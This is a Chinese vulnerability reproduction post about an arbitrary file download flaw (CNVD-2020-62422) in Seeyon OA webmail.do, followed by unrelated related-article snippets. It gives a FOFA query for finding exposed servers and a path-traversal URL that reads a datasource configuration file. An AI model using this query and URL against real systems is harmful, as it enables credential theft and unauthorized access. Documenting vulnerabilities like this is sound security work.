首页 > 其他分享 >致远OA webmail.do 任意文件下载 CNVD-2020-62422

致远OA webmail.do 任意文件下载 CNVD-2020-62422

时间:2023-09-04 15:26:22浏览次数:40  
标签:do 致远 文件 CNVD filePath 62422 OA webmail

漏洞描述

致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息

影响版本

致远OA A6-V5
致远OA A8-V5
致远OA G6

漏洞复现

fofa语法:app="致远互联-OA"
登录页面如下:

致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。
通过修改filePath参数来下载服务器文件
http://www.xxx.com/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties

更改参数 filePath 可下载其他文件

标签:do,致远,文件,CNVD,filePath,62422,OA,webmail
From: https://www.cnblogs.com/pursue-security/p/17677119.html

相关文章

  • Dotnet6 NPOI操作Excel基本操作总结
    背景需要对Excel进行读取和写入,目前使用Dotnet6开发环境,故直接使用。达到的效果:兼容.xls和.xlsx,识别行为空自动跳过,识别显示值,识别格式内容步骤Dotnet6Nuget安装NPOI,具体版本2.6.1,tips:搜索资料时,可能NPOI1与NPOI2可能有出入。使用方法获取相应文档对象......
  • 爬虫配置必备:JQuery|querySelector|Cheerio DOM节点选择干货集
    作者:fbysss前言网页爬取,是一项既费脑子又繁琐的工作。因为网页格式不一,很难完全靠机器自动识别。通常,我们可以采用css选择器来选取DOM节点,从整个网页中抽取我们需要的内容。前端大家最熟悉的应该是JQuery了。如果JQuery不好用,可以直接使用原生的document.querySelectorAll,现在的浏......
  • Markdown
    简介-教程Markdown是一种轻量级标记语言,它允许人们使用易读易写的纯文本格式编写文档。VSCode下安装MarkdownPreviewEnhanced插件标题我展示的是一级标题=================我展示的是二级标题-----------------#一级标题##二级标题###三级标题####四级标题......
  • Windows IIS提示80端口被占用
    在使用IIS部署网站中提示“无法启动此网站。其他网站可能存在同一端口。”报错截图如下:netstat-aon|findstr"80"##查找http服务控制器进程IDnetshhttpshowservicestate最后在任务管理器找到相关PID进程......
  • ZLMeidaKit在Windows上启动时:计算机中丢失MSVCR110.dll,以及rtmp推流后无法转换为flv
    场景ZLMediaKit在Windows上实现Rtmp流媒体服务器以及模拟rtmp推流和http-flv拉流播放:https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/130221608按照以上教程启动MediaServer.exe时提示:无法启动此程序,因为计算机中缺失MSVCR110.dll,尝试重新安装程序以解决此问题......
  • Markdown语法学习
    Markdown学习标题:(#+空格,几级就是几个,最多6级)二级标题三级标题四级标题字体Hello,World!(两边**,加粗)Hello,World!(两边*,斜体)Hello,World!(两边***,斜体)Hello,World!(两边~~,斜体)引用Java学习(>+空格)分割线三个---回车三个***回车图片(可以是本地也可以是网上)![截图](C:\Us......
  • Unity UGUI的Dropdown(下拉菜单)组件的介绍及使用
    UnityUGUI的Dropdown(下拉菜单)组件的介绍及使用1.什么是Dropdown组件?Dropdown(下拉菜单)是UnityUGUI中的一个常用组件,用于在用户点击或选择时显示一个下拉菜单,提供多个选项供用户选择。2.Dropdown组件的工作原理Dropdown组件由两部分组成:一个可点击的按钮和一个下拉菜单。当......
  • docker桌面端安装mysql
    参考 https://www.yzktw.com.cn/post/735256.html1,搜索Images,mysql,选择合适的版本pull2,Images,中点击三角箭头,run,会弹出新建Containers弹框Containersname,随便写Ports需要写0Volumes选安装地址EnvironmentVarialbes需要加上密码MYSQL_ROOT_PASSWORD: 123456 3,运行......
  • DOM 概述
    一:什么是domdom是一种文档对象模型,同时也是用于html编程的接口,通过dom来操作页面中的元素。当html页面被实现加载的时候,浏览器会创建一个dom,给文档提供了一种新的逻辑结构,并且可以改变内容和结构。DOM是面向对象,并且定义了修改文档所需要的对象,各个对象之前的关系,我们可以也页面......
  • Docker构建Jenkins
    拉取jenkins的docker镜像,这里用的是lts的长期支持版本,你可以到jenkins官网自由选择其他版本(下载速度慢,花了两个小时,如果中途出现超时再次运行该命令即可)dockerpulljenkins/jenkins:lts配置宿主机映射到容器的目录,之后jenkins的一些配置文件......